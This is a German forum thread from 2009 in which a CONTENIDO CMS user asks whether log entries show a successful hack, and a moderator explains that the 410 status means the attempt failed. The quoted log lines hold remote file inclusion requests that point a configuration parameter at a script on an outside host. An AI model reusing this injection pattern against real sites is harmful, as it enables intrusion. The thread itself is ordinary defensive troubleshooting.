Gehackt oder nicht ...

Fragen zur Installation von CONTENIDO 4.9? Probleme bei der Konfiguration? Hinweise oder Fragen zur Entwicklung des Systemes oder zur Sicherheit?
Antworten
Leo
Beiträge: 308
Registriert: Mi 19. Apr 2006, 19:26
Kontaktdaten:
Kontaktdaten von Leo

Gehackt oder nicht ...

Beitrag von Leo »

Hallo Contenido-Gemeinde,

Mal ne ganz dumme Frage: Wenn ich im Logfile solche Einträge finde, muss ich davon ausgehen, dass ich gehackt wurde:
72.233.80.42 - - [22/Feb/2009:08:34:55 +0100] "GET //conlib/local.php?cfg[path][contenido]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 410 313 http://www.xxx.de "-" "libwww-perl/5.810" "-"
72.233.80.42 - - [22/Feb/2009:08:34:55 +0100] "GET /igs/cms/front_content.php?idcat%20...//conlib/local.php?cfg[path][contenido]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 410 321 http://www.xxx.de "-" "libwww-perl/5.810" "-"
Oder ist das nur ein Versuch gewesen? In den jeweiligen Verzeichnis kann ich auch nichts finden. Auch mein Antivirenprogramm bleibt ruhig. Das CMS ist auch noch ziemlich neu (Version 4.8.7) und register_global und allow_url_fopen auf off. Außerdem ist das Backend durch htaccess zusätzlich gesperrt.

Viele Grüße

Leonhard
Nach oben
xmurrix
Beiträge: 3215
Registriert: Do 21. Okt 2004, 11:08
Wohnort: Augsburg
Hat sich bedankt: 4 Mal
Danksagung erhalten: 17 Mal
Kontaktdaten:
Kontaktdaten von xmurrix

Re: Gehackt oder nicht ...

Beitrag von xmurrix »

Leo hat geschrieben:...

Mal ne ganz dumme Frage: Wenn ich im Logfile solche Einträge finde, muss ich davon ausgehen, dass ich gehackt wurde:
72.233.80.42 - - [22/Feb/2009:08:34:55 +0100] "GET //conlib/local.php?cfg[path][contenido]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 410 313 http://www.xxx.de "-" "libwww-perl/5.810" "-"
72.233.80.42 - - [22/Feb/2009:08:34:55 +0100] "GET /igs/cms/front_content.php?idcat%20...//conlib/local.php?cfg[path][contenido]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 410 321 http://www.xxx.de "-" "libwww-perl/5.810" "-"
Oder ist das nur ein Versuch gewesen? In den jeweiligen Verzeichnis kann ich auch nichts finden. Auch mein Antivirenprogramm bleibt ruhig. Das CMS ist auch noch ziemlich neu (Version 4.8.7) und register_global und allow_url_fopen auf off. Außerdem ist das Backend durch htaccess zusätzlich gesperrt....
Hallo,

der HTTP- Status Codes des Beispiels ist 410, d. h. der HTTP-Server hat die Seite nicht ausgeliefert, also es kam nicht zu einem erfolgreichen Hack. Falls du in den Logs solche URLs mit einem HTTP 200 findest, müsstest du dir dann doch Gedanken machen. Das Contenido-Verzeichnis zu schützen ist eine sehr gute Idee. Bedenke aber, das es auch möglich wäre, über das Frontend "rein zu kommen", sofern deine Installation nicht geschützt ist.

Die Version 4.8.7 ist da schon mal mit dem integrierten Security-Check gut gegen sowas ausgerüstet.

Gruß
xmurrix
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
Nach oben
Leo
Beiträge: 308
Registriert: Mi 19. Apr 2006, 19:26
Kontaktdaten:
Kontaktdaten von Leo

Re: Gehackt oder nicht ...

Beitrag von Leo »

Danke für den Tipp!

Gruß Leonhard
Nach oben
Leo
Beiträge: 308
Registriert: Mi 19. Apr 2006, 19:26
Kontaktdaten:
Kontaktdaten von Leo

Re: Gehackt oder nicht ...

Beitrag von Leo »

Hallo Contenido-Gemeinde,

zu dem Thema habe ich noch eine Frage: Wenn ich eine solche Meldung im Errorlog von Contenido habe, deutet das auf einen Hackerversuch hin?

Code: Alles auswählen

[18-Apr-2009 16:15:32] /xxx/contenido/main.php?area=htmltpl&frame=2&contenido=e6bacf25e4e96d7cc962ecd16e449a10 MySQL error 1062: Duplicate entry 'e6bacf25e4e96d7cc962ecd16e449a10' for key 1
insert into xxx_phplib_active_sessions ( sid, name, val, changed ) values ('e6bacf25e4e96d7cc962ecd16e449a10', 'contenido', 'Y29udGVuaWRvOiR0aGlzLT5pbiA9ICcwJzsgJHRoaXMtPnB0ID0gYXJyYXkoKTsgJHRoaXMtPnB0WydhdXRoJ10gPSAnMSc7ICR0aGlzLT5wdFsnY2hhbGxlbmdlJ10gPSAnMSc7ICR0aGlzLT5wdFsnc2F2ZUxvZ2luVGltZSddID0gJzEnOyAkdGhpcy0+cHRbJ2JlbGFuZyddID0gJzEnOyAkdGhpcy0+cHRbJ2NsaWVudCddID0gJzEnOyAkdGhpcy0+cHRbJ2xhbmcnXSA9ICcxJzsgJHRoaXMtPnB0WydzZXNzX2FyZWEnXSA9ICcxJzsgJHRoaXMtPnB0WydjZmdDbGllbnQnXSA9ICcxJzsgJHRoaXMtPnB0WydlcnJzaXRlX2lkY2F0J10gPSAnMSc7ICR0aGlzLT5wdFsnZXJyc2l0ZV9pZGFydCddID0gJzEnOyAkR0xPQkFMU1snYXV0aCddID0gbmV3IENvbnRlbmlkb19DaGFsbGVuZ2VfQ3J5cHRfQXV0aDsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aCA9IGFycmF5KCk7ICRHTE9CQUxTWydhdXRoJ10tPmF1dGhbJ3VpZCddID0gJzIxMjMyZjI5N2E1N2E1YTc0Mzg5NGEwZTRhODAxZmMzJzsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsncGVybSddID0gJ2FkbWluWzFdJzsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsnZXhwJ10gPSAnMTI0MDA2NzczMSc7ICRHTE9CQUxTWydhdXRoJ10tPmF1dGhbJ3JlZnJlc2gnXSA9ICcxMjQwMDYzOTAyJzsgJEdMT0JBTFNbJ2F1dGgnXS0+YXV0aFsndW5hbWUnXSA9ICdhZG1pbic7ICRHTE9CQUxTWydjaGFsbGVuZ2UnXSA9ICczMjgzYTZjMWVlNzFiZDZjZWZiZGY1ZTcyZWE0MWI2NSc7ICRHTE9CQUxTWydzYXZlTG9naW5UaW1lJ10gPSAnMCc7ICRHTE9CQUxTWydiZWxhbmcnXSA9ICdkZV9ERSc7ICRHTE9CQUxTWydjbGllbnQnXSA9ICcxJzsgJEdMT0JBTFNbJ2xhbmcnXSA9ICcxJzsgJEdMT0JBTFNbJ3Nlc3NfYXJlYSddID0gJ2h0bWx0cGwnOyAkR0xPQkFMU1snY2ZnQ2xpZW50J10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJ3NldCddID0gJ3NldCc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3BhdGgnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydwYXRoJ11bJ2Zyb250ZW5kJ10gPSAnL2hvbWVwYWdlcy8xNi9kMzU0NTAyMzYvaHRkb2NzL2lncy9jbXMvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3BhdGgnXVsnaHRtbHBhdGgnXSA9ICdodHRwOi8vd3d3Lmlncy1oYWxsZS5kZS9pZ3MvY21zLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydpbWFnZXMnXSA9ICdodHRwOi8vd3d3Lmlncy1oYWxsZS5kZS9pZ3MvY21zL2ltYWdlcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndXBsb2FkJ10gPSAndXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydodG1scGF0aCddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ2h0bWxwYXRoJ11bJ2Zyb250ZW5kJ10gPSAnaHR0cDovL3d3dy5pZ3MtaGFsbGUuZGUvaWdzL2Ntcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndXBsJ10gPSBhcnJheSgpOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsndXBsJ11bJ3BhdGgnXSA9ICcvaG9tZXBhZ2VzLzE2L2QzNTQ1MDIzNi9odGRvY3MvaWdzL2Ntcy91cGxvYWQvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3VwbCddWydodG1scGF0aCddID0gJ2h0dHA6Ly93d3cuaWdzLWhhbGxlLmRlL2lncy9jbXMvdXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWyd1cGwnXVsnZnJvbnRlbmRwYXRoJ10gPSAndXBsb2FkLyc7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydjc3MnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydjc3MnXVsncGF0aCddID0gJy9ob21lcGFnZXMvMTYvZDM1NDUwMjM2L2h0ZG9jcy9pZ3MvY21zL2Nzcy8nOyAkR0xPQkFMU1snY2ZnQ2xpZW50J11bJzEnXVsnanMnXSA9IGFycmF5KCk7ICRHTE9CQUxTWydjZmdDbGllbnQnXVsnMSddWydqcyddWydwYXRoJ10gPSAnL2hvbWVwYWdlcy8xNi9kMzU0NTAyMzYvaHRkb2NzL2lncy9jbXMvanMvJzsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3RwbCddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2NmZ0NsaWVudCddWycxJ11bJ3RwbCddWydwYXRoJ10gPSAnL2hvbWVwYWdlcy8xNi9kMzU0NTAyMzYvaHRkb2NzL2lncy9jbXMvdGVtcGxhdGVzLyc7ICRHTE9CQUxTWydlcnJzaXRlX2lkY2F0J10gPSBhcnJheSgpOyAkR0xPQkFMU1snZXJyc2l0ZV9pZGNhdCddWycxJ10gPSAnMzEnOyAkR0xPQkFMU1snZXJyc2l0ZV9pZGFydCddID0gYXJyYXkoKTsgJEdMT0JBTFNbJ2VycnNpdGVfaWRhcnQnXVsnMSddID0gJzM2Jzsg', '20090418161532')
Oder werde ich einfach automatisch nach einer gewissen Zeit, wenn ich kein Änderungen am CMS vorgenommen habe, aus dem System rausgeschmissen.

Vielen Dank für eure Rückmeldung im Voraus!

Gruß

Leonhard
Nach oben
idea-tec
Beiträge: 1242
Registriert: Do 19. Sep 2002, 14:41
Wohnort: Dichtelbach
Kontaktdaten:
Kontaktdaten von idea-tec

Re: Gehackt oder nicht ...

Beitrag von idea-tec »

zweites:

siehe hier: http://forum.contenido.org/viewtopic.php?f=36&t=23649
und auch hier: http://forum.contenido.org/viewtopic.php?f=36&t=23638

wen geht jeweils die kompletten threads lesen
MfG, Karsten
Nicht Können bedeutet nicht, dass man etwas nicht beherrscht, sondern lediglich, dass man sich nicht traut es zu tun ;-)
| Internet | Ihr Logo deutschlandweit auf T-Shirts |
Diplomatie: Jemanden so in die Hölle zu schicken, dass er sich auf die Reise freut!!! ;-)
Nach oben
Antworten

Zurück zu „Allgemeine Themen“